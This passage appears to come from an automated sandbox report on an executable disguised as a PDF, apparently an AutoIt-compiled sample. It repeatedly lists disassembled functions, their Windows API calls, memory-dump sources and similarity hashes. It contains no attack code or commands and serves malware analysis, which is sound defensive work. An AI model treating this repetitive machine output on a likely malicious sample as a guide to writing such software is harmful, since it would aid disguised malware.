                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ClientRectScreen$InvalidateWindow
                              • String ID:
                              • API String ID: 357397906-0
                              • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                              • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                              • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                              • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                              Function 00433908 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                              Download Yara Rule
                              APIs
                              • __wsplitpath.LIBCMT ref: 0043392E
                                • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                              • __wsplitpath.LIBCMT ref: 00433950
                              • __wcsicoll.LIBCMT ref: 00433974
                              • __wcsicoll.LIBCMT ref: 0043398A
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                              • String ID:
                              • API String ID: 1187119602-0
                              • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                              • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                              • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                              • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                              Function 00434963 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _wcslen$_malloc_wcscat_wcscpy
                              • String ID:
                              • API String ID: 1597257046-0
                              • Opcode ID: a4231aec4d80d75c49e81e4c27ca68212e1c2fe3aff6bb962a105ec03e57c75a
                              • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                              • Opcode Fuzzy Hash: a4231aec4d80d75c49e81e4c27ca68212e1c2fe3aff6bb962a105ec03e57c75a
                              • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                              Function 0041F584 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                              Download Yara Rule
                              APIs
                              • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                              • __malloc_crt.LIBCMT ref: 0041F5B6
                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: EnvironmentStrings$Free__malloc_crt
                              • String ID:
                              • API String ID: 237123855-0
                              • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                              • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                              • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                              • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                              Function 004556BE Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: DeleteDestroyObject$IconWindow
                              • String ID:
                              • API String ID: 3349847261-0
                              • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                              • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                              • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                              • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                              Function 0044B5E8 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                              Download Yara Rule
                              APIs
                              • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                              • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                              • String ID:
                              • API String ID: 2223660684-0
                              • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                              • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                              • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                              • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                              Function 004472F1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                              • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                              • LineTo.GDI32(?,?,?), ref: 00447326
                              • EndPath.GDI32(?), ref: 00447336
                              • StrokePath.GDI32(?), ref: 00447344
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                              • String ID:
                              • API String ID: 2783949968-0
                              • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                              • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                              • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                              • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                              Function 0043646A Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                              • GetCurrentThreadId.KERNEL32 ref: 004364A3
                              • AttachThreadInput.USER32(00000000), ref: 004364AA
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                              • String ID:
                              • API String ID: 2710830443-0
                              • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                              • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                              • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                              • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                              Function 00436C2B Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                              • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                              • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                              • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                              • String ID:
                              • API String ID: 146765662-0
                              • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                              • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                              • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                              • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                              Function 00472B63 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              • GetDesktopWindow.USER32 ref: 00472B63
                              • GetDC.USER32(00000000), ref: 00472B6C
                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                              • ReleaseDC.USER32(00000000,?), ref: 00472B99
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CapsDesktopDeviceReleaseWindow
                              • String ID:
                              • API String ID: 2889604237-0
                              • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                              • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                              • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                              • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                              Function 00472BB2 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              • GetDesktopWindow.USER32 ref: 00472BB2
                              • GetDC.USER32(00000000), ref: 00472BBB
                              • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                              • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CapsDesktopDeviceReleaseWindow
                              • String ID:
                              • API String ID: 2889604237-0
                              • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                              • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                              • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                              • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                              Function 0041514D Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON
                              Download Yara Rule
                              APIs
                              • __getptd_noexit.LIBCMT ref: 00415150
                                • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                              • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                              • __freeptd.LIBCMT ref: 0041516B
                              • ExitThread.KERNEL32 ref: 00415173
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                              • String ID:
                              • API String ID: 1454798553-0
                              • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                              • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                              • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                              • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                              Function 0042F373 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _strncmp
                              • String ID: Q\E
                              • API String ID: 909875538-2189900498
                              • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                              • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                              • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                              • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                              Function 00460D41 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                              Download Yara Rule
                              APIs
                              • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                              • String ID: AutoIt3GUI$Container
                              • API String ID: 2652923123-3941886329
                              • Opcode ID: 8072d5a6eeba690fa35a4ade7926f5ea60e583888e5bb087a82b37f5ec0490ad
                              • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                              • Opcode Fuzzy Hash: 8072d5a6eeba690fa35a4ade7926f5ea60e583888e5bb087a82b37f5ec0490ad
                              • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                              Function 0044F3F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _memmove_strncmp
                              • String ID: U$\
                              • API String ID: 2666721431-100911408
                              • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                              • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                              • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                              • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                              Function 00467215 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                              • __wcsnicmp.LIBCMT ref: 00467288
                              • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
